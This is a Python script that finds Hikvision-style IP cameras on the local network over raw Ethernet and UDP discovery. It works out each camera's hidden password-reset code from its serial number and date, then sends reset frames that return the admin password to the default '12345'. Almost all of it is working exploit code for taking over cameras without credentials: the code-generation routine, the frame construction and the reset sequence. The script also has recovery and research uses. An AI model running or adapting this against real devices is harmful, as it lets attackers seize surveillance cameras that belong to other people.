#!/usr/bin/env python
# copyright: GPL3 something rather
# author: Sergei
from socket import socket, PF_PACKET, SOCK_RAW, AF_INET, SOCK_DGRAM, timeout, SOL_SOCKET, SO_REUSEADDR, SO_BROADCAST, SOCK_STREAM
import binascii,fcntl,struct,time,uuid,xml.etree.ElementTree,sys,getopt

use_boot_date = False
override_date = False
bcast_mac = "ffffffffffff"
ether_type = "8033"
discovery_headers = ["210201420000","06040300","BEEF"]
reply_headers = ["210101f60000","06040b01","0a0101fb","00000000ffffff00"]
reset_headers = ["210201420000","06040a00","BEEF","0a0101fbffffff00"]
bad_reply_header = '06040b02'
start_counter = "beef"
interface = "eth0"
time_out = 1
uuid = str(uuid.uuid4()).upper()
discovery_xml = '<?xml version="1.0" encoding="utf-8"?><Probe><Uuid>'+uuid+'</Uuid><Types>inquiry</Types></Probe>'
udp_bcast = '239.255.255.250'
udp_port = 37020

macs_to_reset = []
def full_help():
    print("Usage:\n")
    print("'%s -h' prints this help" % sys.argv[0])
    print("'%s -r <MACADDRESS>' will reset a single camera with specified MAC address"  % sys.argv[0]) 
    print("'%s -r <MACADDRESS>,<MACADDRESS1>,<MACADDRESSn>' will reset a multiple cameras with specified comma separated MAC addresses"  % sys.argv[0]) 
    print("'%s -b' will force to use boot time as the date for reset code generation (useful when camera date is unknown and camera has been rebooted)"  % sys.argv[0]) 
    print("'%s -o' disables date detection and use local time (unless -b is set, then it uses boot time)"  % sys.argv[0]) 
try:
    opts, args = getopt.getopt(sys.argv[1:],'-r:-h-b-o')
except getopt.GetoptError:
    full_help()
    sys.exit(1)

if len(opts) == 0:
    print("No arguments supplied: running in discvory mode.\nUse '%s -h' for help.\n" % sys.argv[0])

for o, a in opts:
    if o == '-r':
        macs_to_reset = a.split(',')
        print("Resetting cameras with following MAC addresses:")
        for mac in macs_to_reset:
            print("\t%s" % mac)
    elif o == '-h':
        full_help()
        sys.exit(1)
    elif o == '-b':
        use_boot_date = True
        print("Setting camera boot time as fallback for date")
    elif o == '-o':
        override_date = True
        print("Disabling date detection")
    else:
        full_help()
        sys.exit(1)

print("\n")

def swap_bytes(sixteen):
    a = sixteen >> 8
    b = sixteen << 8 & 0xff00
    return a+b

def carry_around_add(a, b):
    c = a + b
    return (c & 0xffff) + (c >> 16)

def hik_checksum(payload):
    p = binascii.unhexlify(payload)
    if len(p)%2 > 0:
        p +='\x00'
    t = 0
    for i in range(0, len(p), 2):
        b = ord(p[i]) + (ord(p[i+1]) << 8) 
        c = t + b
        t = (c & 0xffff) + (c >> 16)
    t = ~t & 0xffff
    return "%04x" % swap_bytes(t)

def hik_counter(c):
    cnt = int(c,16)
    inc = cnt & 0xffff
    dec = 0xffff - inc
    return "%04x" % inc, "%04x" % dec

def get_mac(interface,s):
    mac = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', interface[:15]))[18:24]
    return binascii.hexlify(mac)

def discovery_frame(src_mac,bcast_mac,start_counter,ether_type,frame_headers):
    c_up,c_down = hik_counter(start_counter)
    pre_payload = frame_headers[0] + c_up + frame_headers[1] + "%04x" % swap_bytes(int(c_down,16)) + src_mac + frame_headers[2] + bcast_mac
    payload = bcast_mac + src_mac + ether_type + frame_headers[0] + c_up + frame_headers[1] + c_down + src_mac+frame_headers[2] + hik_checksum(pre_payload)+bcast_mac
    filler = 160 - len(payload) # fill to 80 bytes / 160 hex characters
    payload += "0" * filler
    return binascii.unhexlify(payload)

def reset_frame(src_mac,dst_mac,start_counter,ether_type,frame_headers,code):
    start_counter = "%04x" % (int(start_counter,16)+1)
    c_up,c_down = hik_counter(start_counter)
    pre_payload = frame_headers[0] + c_up+frame_headers[1] + "%04x" % swap_bytes(int(c_down,16)) + src_mac + frame_headers[2] + bcast_mac + frame_headers[3] + code
    payload = dst_mac + src_mac + ether_type + frame_headers[0] + c_up + frame_headers[1] + c_down+src_mac + frame_headers[2] + hik_checksum(pre_payload) + bcast_mac + frame_headers[3] + code
    filler = 160 - len(payload) # fill to 80 bytes / 160 hex characters
    payload += "0" * filler
    return binascii.unhexlify(payload)

def hik_magic_fairy_dust(serial,timestamp):
    # this obscure shit makes me very angry
    magic_number = 0
    unicorn_shit = ""
    day = "%02d" % int(timestamp[0])
    month = "%02d" % int(timestamp[1])
    year = timestamp[2]
    magic_string = serial+year+month+day

    for i in range(0,len(magic_string)):
        # SECURITY THROUGH OBSCURITY
        magic_number += (ord(magic_string[i]) * (i + 1)) ^ (i + 1)
    magic_number *= 1751873395
    magic_number = magic_number & 0xffffffff #overflow the shit out of the 32bit int
    for i in range(0,len(str(magic_number))):
        c = ord(str(magic_number)[i])
        if c < 51:
            unicorn_shit += chr(c + 33)
        elif c < 53:
            unicorn_shit += chr(c + 62)
        elif c < 55:
            unicorn_shit += chr(c + 47)
        elif c < 57:
            unicorn_shit += chr(c + 66)
        else:
            unicorn_shit += chr(c);
    return unicorn_shit

def process_frame(frame):
    #dst_mac = frame[0:6]
    mac = binascii.hexlify(frame[6:12])
    #ether_type = frame[12:14]
    #header = frame[14:20]
    #cnt_up = frame[20:22]
    header1 = binascii.hexlify(frame[22:26])
    #cnt_dwn = frame[26:28]
    #src_mac1 = frame[28:34]
    #header2 = frame[34:36]
    #checksum = frame[36:38]
    #dst_mac1 = frame[38:44]
    serial = frame[52:100].strip('\x00')
    fw_ver = frame[116:164].strip('\x00')
    dsp_ver = frame[164:212].strip('\x00')
    date = frame[212:260].strip('\x00')
    model = frame[368:416].strip('\x00')
    return (mac,header1,serial,fw_ver,dsp_ver,date,model)

def get_camera_date(camera):
    global time_out,use_boot_date,override_date
    if override_date and use_boot_date:
        year,month,day = camera['boot_date'][0:10].split('-')
        return (day,month,year)
    elif override_date:
        day,month,year = time.strftime("%d %m %Y", time.gmtime()).split()
        return (day,month,year)
    ip = camera['ip']
    port = camera['port']
    print("Getting date via HTTP GET for camera '%s', address '%s:%d'..." % (camera['serial'],ip,port))
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(time_out)
    print("Connecting to %s:%d..." % (ip,port))
    try:
        s.connect((ip, port))
        print("Sending GET request..")
        s.send("GET / HTTP/1.0\r\n\r\n")
        day,month_name,year = s.recv(1024).split('\n')[1].split()[2:5]
        s.close()
        month = str(time.strptime(month_name,'%b').tm_mon)
    except timeout:
        s.close()
        print("Timed out while connecting to %s:%d. Perhaps not in the same subnet?" % (ip,port))
        if use_boot_date:
            year,month,day = camera['boot_date'][0:10].split('-')
            return (day,month,year) 
        return (None)
    return (day,month,year)

def reset_camera(dst_mac,unicorn_shit):
    global time_out,ether_type,reply_headers
    s = socket(PF_PACKET, SOCK_RAW,int(ether_type,16))
    s.settimeout(time_out)
    src_mac = get_mac(interface,s)
    s.bind((interface, int(ether_type,16)))
    print("Sending reset frame to MAC '%s', code '%s'" % (mac,unicorn_shit))
    s.send(reset_frame(src_mac,dst_mac,start_counter,ether_type,reset_headers,binascii.hexlify(unicorn_shit)))
    result = False
    try:
        reply = process_frame(s.recv(1024))[1]
        if reply == reply_headers[1]:
            print("Success! Password for username 'admin' has been reset to default ('12345')")
            result = True
        else:
            print("Failure! Perhaps wrong date?")
        s.close()
    except timeout:
        print("Timed out while wating for reply frame after sending reset frame to MAC '%s', code '%s'" % (mac,unicorn_shit))
        s.close()
    return result

def discover_cameras_frame():
    global time_out,ether_type,discovery_headers,start_counter,bcast_mac
    frames = []

    s = socket(PF_PACKET, SOCK_RAW,int(ether_type,16))
    s.settimeout(time_out)
    src_mac = get_mac(interface,s)
    s.bind((interface, int(ether_type,16)))
    print("Sending discovery broadcast frame...")
    s.send(discovery_frame(src_mac,bcast_mac,start_counter,ether_type,discovery_headers))

    while True:
        try:
            frames.append(s.recv(1024))
        except timeout:
            print("Received %d frame(s) in %ds timeout window." % (len(frames),time_out))
            break
    s.close()
    return frames

def discover_cameras_udp():
    global time_out,discovery_xml,udp_port,udp_bcast
    s = socket(AF_INET, SOCK_DGRAM)
    s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
    s.settimeout(time_out)
    print("Sending discovery UDP broadcast packet...")
    s.sendto(discovery_xml, (udp_bcast,udp_port ))
    udps = []
    while True:
        try:
            udps.append(s.recv(1024))
        except timeout:
            print("Received %d udp packets(s) in %ds timeout window." % (len(udps),time_out))
            break
    s.close()
    return udps

def process_udp(udp):
    r = xml.etree.ElementTree.fromstring(udp)
    m = ''.join(r.find('MAC').text.split('-')).lower()
    s = r.find('DeviceSN').text
    i = r.find('IPv4Address').text
    n = r.find('IPv4SubnetMask').text
    g = r.find('IPv4Gateway').text
    h = r.find('HttpPort').text
    return (m,s,i,n,g,h)

def discovery():
    cameras = {}
# structure:
# { '%MAC%' => 
#    { 'serial' => '%SERIAL%', 
#      'fw_version' => '%FW_VERSION%', 
#      'dsp_version' => '%DSP_VERSION%', 
#      'boot_date' => '%BOOT_DATE%', 
#      'model' => '%MODEL%',
#      'ip' => '%IP%',
#      'nm' => '%NM%',
#      'gw' => '%GW%',
#      'port' => '%PORT%',
#      'cam_date' => '%DATE%',
#      'reset_code' => '%UNICORN_SHIT%',
# }
    frames = discover_cameras_frame()
    for frame in frames:
        f = process_frame(frame)
        cameras[f[0]] = {'serial' : f[2], 'fw_version' : f[3], 'dsp_version' : f[4], 'boot_date' : f[5],'model' : f[6] }
    udps = discover_cameras_udp()
    if len(udps) != len(frames):
        print("Warning: not equal amount of cameras found between UDP and ethernet frame discovery")
    for udp in udps:
        u =  process_udp(udp)
        if u[0] in cameras:
            cameras[u[0]]['ip'] = u[2]
            cameras[u[0]]['nm'] = u[3]
            cameras[u[0]]['gw'] = u[4]
            cameras[u[0]]['port'] = int(u[5])
            cameras[u[0]]['cam_date'] = get_camera_date(cameras[u[0]])
            cameras[u[0]]['reset_code'] = hik_magic_fairy_dust(cameras[u[0]]['serial'],cameras[u[0]]['cam_date'])
        else:
            print("Warning: camera (MAC '%s', ip '%s') found during UDP discovery, initially not found during ethernet frame discovery" % (u[0],u[2]))
    return cameras

cams = discovery()
print("\nFound %d camera(s)..." % len(cams))
for mac,cam in cams.iteritems():
    print("\nCamera:\tModel:\t%s" % cams[mac]['model'])
    print("\tMAC:\t%s" % mac)
    print("\tSerial:\t%s" % cams[mac]['serial'])
    print("\tIP:\t%s" % cams[mac]['ip'])
    print("\tNetmask:\t%s" % cams[mac]['nm'])
    print("\tGateway:\t%s" % cams[mac]['gw'])
    print("\tWeb Port:\t%s" % cams[mac]['port'])
    print("\tFW Version:\t%s" % cams[mac]['fw_version'])
    print("\tDSP FW Version:\t%s" % cams[mac]['dsp_version'])
    print("\tBoot date:\t%s" % cams[mac]['boot_date'])
    print("\tCamera date:\t%s" % '-'.join(map(str,cams[mac]['cam_date'])))
    print("\tReset code:\t%s" % cams[mac]['reset_code'])

if len(macs_to_reset) > 0:
    for mac in macs_to_reset:
        reset_camera(mac,cams[mac]['reset_code'])





